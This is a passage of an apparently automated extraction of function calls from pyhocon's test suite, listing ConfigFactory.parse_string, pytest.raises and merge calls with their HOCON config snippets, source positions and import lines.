'ConfigFactory.parse_string', (['"""\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """'], {}), '(\n """\n num = 3\n retries_msg = You have ${num} retries\n retries_msg = ${?CUSTOM_MSG}\n """\n )\n', (44739, 44887), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45312, 45489), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a 
=\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """'], {}), '(\n """\n a =\n 4\n\n b = # test\n # test2\n 5\n\n c =\n\n 6\n """\n )\n', (45338, 45489), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((45647, 45803), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """'], {}), '(\n """\n short = 12\n long = 12321321837612378126213217321\n negative = -15\n """\n )\n', (45673, 45803), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46186, 46331), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """'], {}), '(\n """\n a = 121.22\n b = -121.22\n c = .54\n d = -.54\n """\n )\n', (46212, 46331), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((46684, 46908), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """'], {}), '(\n """\n short = 12.12321\n long1 = 121.22E3423432\n neg_long1 = 121.22E-1\n long2 = 121.22e3423432\n neg_long2 = 121.22e-3\n """\n )\n', (46710, 46908), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47301, 47484), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """'], {}), '(\n """\n a =\n "a"\n\n b = # test\n # test2\n "b"\n\n c =\n\n "c"\n """\n )\n', (47327, 47484), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((47666, 47961), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a =\n [\n 1,\n 2,\n ]\n\n b = # test\n # test2\n [\n 3,\n 4,]\n\n c =\n\n [\n 5,\n 6\n ]\n """\n )\n', (47692, 47961), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48152, 48459), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """'], {}), '(\n """\n a =\n [\n "a",\n "b",\n ]\n\n b = # test\n # test2\n [\n "c",\n "d",]\n\n c =\n\n [\n "e",\n "f"\n ]\n """\n )\n', (48178, 48459), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((48678, 48991), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a =\n {\n a: 1,\n b: 2,\n }\n\n b = # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c =\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (48704, 48991), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49226, 49533), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """'], {}), '(\n """\n a\n {\n a: 1,\n b: 2,\n }\n\n b # test\n # test2\n {\n c: 3,\n d: 4,}\n\n c\n\n {\n e: 5,\n f: 6\n }\n """\n )\n', (49252, 49533), False, 'from pyhocon 
import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49750, 49870), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 123\n a = ${?test}\n a = 5\n """'], {}), '(\n """\n a = 123\n a = ${?test}\n a = 5\n """\n )\n', (49776, 49870), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((49936, 50369), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """'], {}), '(\n """\n {\n database {\n host = "localhost"\n port = 8000\n url = ${database.host}":"${database.port}\n }\n\n database {\n host = ${?DB_HOST}\n }\n\n database {\n host = "other.host.net"\n port = 433\n }\n }\n """\n )\n', (49962, 50369), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50634, 50765), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = {\n b: 1\n c: 2\n }\n """'], {}), '(\n """\n a = {\n b: 1\n c: 2\n }\n """\n )\n', (50660, 50765), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((50797, 50889), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a.b = 4\n a.d = 3\n """'], {}), '(\n """\n a.b = 4\n a.d = 3\n """)\n', (50823, 50889), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51079, 51148), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n name: foo\n """'], {}), '("""\n name: foo\n """)\n', (51105, 51148), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51190, 51296), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n longName: "long "${?name}\n """'], {'resolve': '(False)'}), '(\n u"""\n longName: "long "${?name}\n """, resolve=False)\n', (51216, 51296), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((51553, 51726), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """'], {}), '(\n """\n {\n data-center-generic = { cluster-size: 8 }\n misc = "mist"\n }\n """\n )\n', (51579, 51726), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52286, 52364), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52312, 52364), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52405, 52511), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = ${list} [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '(\n """\n list = ${list} [ 4, 5, 6 ]\n """, resolve=False)\n', (52431, 52511), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52737, 52815), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list = [ 1, 2, 3 ]\n """'], {}), '("""\n list = [ 1, 2, 3 ]\n """)\n', (52763, 52815), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((52856, 52954), 
'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n list += [ 4, 5, 6 ]\n """'], {'resolve': '(False)'}), '("""\n list += [ 4, 5, 6 ]\n """,\n resolve=False)\n', (52882, 52954), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53166, 53314), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """'], {'resolve': '(False)'}), '(\n """\n a : { }\n b : 1\n c : ${a} { d : [ ${b} ] }\n """\n , resolve=False)\n', (53192, 53314), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53357, 53461), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (53383, 53461), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53508, 53550), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (53532, 53550), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53559, 53601), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (53593, 53601), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53718, 53866), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n x : { v1: 1 }\n b1 : {v2: 2 }\n b = [${b1}]\n """\n , resolve=False)\n', (53744, 53866), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((53909, 54035), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """'], {'resolve': '(False)'}), '(\n """\n b2 : ${x} {v2: 3}\n b += [${b2}]\n """,\n resolve=False)\n', (53935, 54035), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54078, 54120), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54102, 54120), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54129, 54171), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54163, 54171), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54378, 54500), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 1 }\n b = [${b1}]\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 1 }\n b = [${b1}]\n """,\n resolve=False)\n', (54404, 54500), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54544, 54645), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n b1 : { v1: 2, v2: 3 }\n """'], {'resolve': '(False)'}), '(\n """\n b1 : { v1: 2, v2: 3 }\n """, resolve=False)\n', (54570, 54645), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54692, 54734), 'pyhocon.ConfigTree.merge_configs', 'ConfigTree.merge_configs', (['config1', 'config2'], {}), '(config1, config2)\n', (54716, 54734), False, 
'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((54743, 54785), 'pyhocon.ConfigParser.resolve_substitutions', 'ConfigParser.resolve_substitutions', (['merged'], {}), '(merged)\n', (54777, 54785), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55014, 55089), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = { x: 1 }\n """'], {}), '("""\n dict = { x: 1 }\n """)\n', (55040, 55089), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55130, 55233), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n dict = ${dict} { y: 2 }\n """'], {'resolve': '(False)'}), '(\n """\n dict = ${dict} { y: 2 }\n """, resolve=False)\n', (55156, 55233), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55452, 55524), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = abc\n """'], {}), '("""\n string = abc\n """)\n', (55478, 55524), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((55565, 55666), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string = ${string}def\n """'], {'resolve': '(False)'}), '(\n """\n string = ${string}def\n """, resolve=False)\n', (55591, 55666), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56001, 56093), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 1\n mid.b = 1\n """'], {}), '(\n """\n a = 1\n mid.b = 1\n """)\n', (56027, 56093), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56289, 56517), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """'], {}), '(\n """\n A = ${Test}\n\n Test {\n field1 = 1\n field2 = ${Test.field1}"2"\n field3 = ${Test.field2}"3"\n }\n """\n )\n', (56315, 56517), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((56918, 57050), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """'], {}), '(\n """\n test_no_quotes: abc\\\\n\\\\n\n test_quotes: "abc\\\\n\\\\n"\n """\n )\n', (56944, 57050), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57235, 57431), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """'], {}), '(\n """\nwith-escaped-backslash: ""\\"\n\\\\\\\\\n""\\"\n\nwith-newline-escape-sequence: ""\\"\n\\\\n\n""\\"\n\nwith-escaped-newline-escape-sequence: ""\\"\n\\\\\\\\n\n""\\"\n """\n )\n', (57261, 57431), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((57726, 57822), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n test = line1 line2\ntest2 = test\n """'], {}), '(\n """\n test = line1 line2\ntest2 = test\n """)\n', (57752, 57822), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), 
((58113, 58139), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58136, 58139), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58228, 58241), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58239, 58241), False, 'from collections import OrderedDict\n'), ((58352, 58378), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58375, 58378), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58466, 58479), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (58477, 58479), False, 'from collections import OrderedDict\n'), ((58657, 58683), 'pyhocon.ConfigFactory.from_dict', 'ConfigFactory.from_dict', (['d'], {}), '(d)\n', (58680, 58683), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((58763, 59090), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """'], {}), '(\n """o1 = {\n foo : {\n a : 1\n b : 2\n }\n }\n o2 = {\n foo : {\n b : 3\n c : 4\n }\n }\n o3 = ${o1} ${o2}\n """\n )\n', (58789, 59090), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59446, 59656), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """'], {}), '(\n """base : {\n bar: ["a"]\n }\n\n sub : ${base} {\n baz: ${base.bar} ["b"]\n }\n\n sub2: ${sub}\n """\n )\n', (59472, 59656), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((59892, 59996), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n e : ${a} {\n }\n """'], {'resolve': '(False)'}), '(\n """\n e : ${a} {\n }\n """, resolve=False)\n', (59918, 59996), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60649, 60721), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo bar\n """'], {}), '("""\n a = foo bar\n """)\n', (60675, 60721), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((60871, 60958), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = foo "bar" dummy\n """'], {}), '(\n """\n a = foo "bar" dummy\n """)\n', (60897, 60958), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61125, 61348), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """'], {}), '(\n """\n x = 5\n b = test\n a = foo "bar" ${b} dummy\n c = foo ${x} bv\n d = foo ${x} 43\n """\n )\n', (61151, 61348), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((61625, 61870), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """'], {'resolve': '(True)'}), '(\n """\n a: 1\n b: ${c} {\n pa: [${a}]\n pb: ${b.pa}\n }\n c: { }\n d: { pc: ${b.pa} }\n e: ${b}\n """\n , resolve=True)\n', (61651, 61870), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, 
ConfigTree\n'), ((62119, 62246), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = // abc\n abc\n\n c =\n 5\n """'], {}), '(\n """\n a = // abc\n abc\n\n c =\n 5\n """\n )\n', (62145, 62246), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62463, 62559), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n string_from_env = ${STRING_VAR}\n """'], {}), '(\n """\n string_from_env = ${STRING_VAR}\n """)\n', (62489, 62559), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((62802, 62893), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${STRING_VAR}\n """)\n', (62828, 62893), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63140, 63232), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n STRING_VAR = ${?STRING_VAR}\n """'], {}), '(\n """\n STRING_VAR = ${?STRING_VAR}\n """)\n', (63166, 63232), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63445, 63542), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n bool_from_env = ${TRUE_OR_FALSE}\n """'], {}), '(\n """\n bool_from_env = ${TRUE_OR_FALSE}\n """)\n', (63471, 63542), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((63787, 63877), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n int_from_env = ${INT_VAR}\n """'], {}), '(\n """\n int_from_env = ${INT_VAR}\n """)\n', (63813, 63877), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((64234, 64274), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['input_string'], {}), '(input_string)\n', (64260, 64274), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65200, 65329), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""'], {}), '(\n """\n foo: "1"\n bar: "2"\n # DO NOT CHANGE ANY OF THE ABOVE SETTINGS!"""\n )\n', (65226, 65329), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65476, 65527), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:[""\\"foo""\\"", "bar"]"""'], {}), '(\'a:["""foo"""", "bar"]\')\n', (65502, 65527), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((65650, 65694), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a:{b: 3, d: 6}"""'], {}), "('a:{b: 3, d: 6}')\n", (65676, 65694), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66063, 66210), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """'], {}), '(\n """\n foo: ${bar}\n foo: ${baz}\n bar: {r: 1, s: 2}\n baz: {s: 3, t: 4}\n """\n )\n', (66089, 66210), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66355, 66480), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: 1\n b: {\n pb: 5\n }\n """'], {}), '(\n """\n a: 1\n b: 
{\n pb: 5\n }\n """\n )\n', (66381, 66480), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66567, 66690), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """'], {}), '(\n """\n quoted: "abc\\\\"test"\n unquoted: abc\\\\"test\n """\n )\n', (66593, 66690), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((66847, 66979), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """'], {}), '(\n """\n value: "{\\\\"critical\\\\":\\\\"0.00\\\\",\\\\"warning\\\\":\\\\"99.99\\\\"}"\n """\n )\n', (66873, 66979), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67121, 67265), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """'], {}), '(\n """\n /abc/cde1: abc\n "/abc/cde2": "cde"\n /abc/cde3: "fgh"\n """\n )\n', (67147, 67265), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((67455, 68030), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """'], {}), '(\n """\n common : {\n }\n\n b1 = []\n\n var = "wrong"\n\n compilerCommon : ${common} {\n VAR : ${var}\n }\n\n substrate-suite: {\n VAR : "right"\n }\n b1 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n\n b2 = [\n ${compilerCommon} ${substrate-suite}\n ${compilerCommon} ${substrate-suite}\n ]\n """\n )\n', (67481, 68030), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((68954, 68988), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['source'], {}), '(source)\n', (68980, 68988), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((69762, 69801), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (69788, 69801), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2231, 2264), 'pytest.raises', 'pytest.raises', (['ParseBaseException'], {}), '(ParseBaseException)\n', (2244, 2264), False, 'import pytest\n'), ((2496, 2525), 'pytest.raises', 'pytest.raises', (['ParseException'], {}), '(ParseException)\n', (2509, 2525), False, 'import pytest\n'), ((5331, 5347), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5337, 5347), True, 'from datetime import timedelta as period\n'), ((9465, 9502), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (9478, 9502), False, 'import pytest\n'), ((11308, 11347), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11321, 11347), False, 'import pytest\n'), ((11361, 11402), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = [4] "4\\""""'], {}), '(\'a = [4] "4"\')\n', (11387, 11402), 
False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11416, 11455), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11429, 11455), False, 'import pytest\n'), ((11469, 11510), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = "4" [5]"""'], {}), '(\'a = "4" [5]\')\n', (11495, 11510), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11524, 11563), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (11537, 11563), False, 'import pytest\n'), ((11577, 11621), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = {b: 5} "4\\""""'], {}), '(\'a = {b: 5} "4"\')\n', (11603, 11621), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21736, 21778), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21749, 21778), False, 'import pytest\n'), ((21792, 21906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent}\n """'], {}), '(\n """\n common_modules = ${non_existent}\n """\n )\n', (21818, 21906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((21941, 21983), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (21954, 21983), False, 'import pytest\n'), ((21997, 22115), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = abc ${non_existent}\n """'], {}), '(\n """\n common_modules = abc ${non_existent}\n """\n )\n', (22023, 22115), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((22150, 22192), 'pytest.raises', 'pytest.raises', (['ConfigSubstitutionException'], {}), '(ConfigSubstitutionException)\n', (22163, 22192), False, 'import pytest\n'), ((22206, 22324), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = ${non_existent} abc\n """'], {}), '(\n """\n common_modules = ${non_existent} 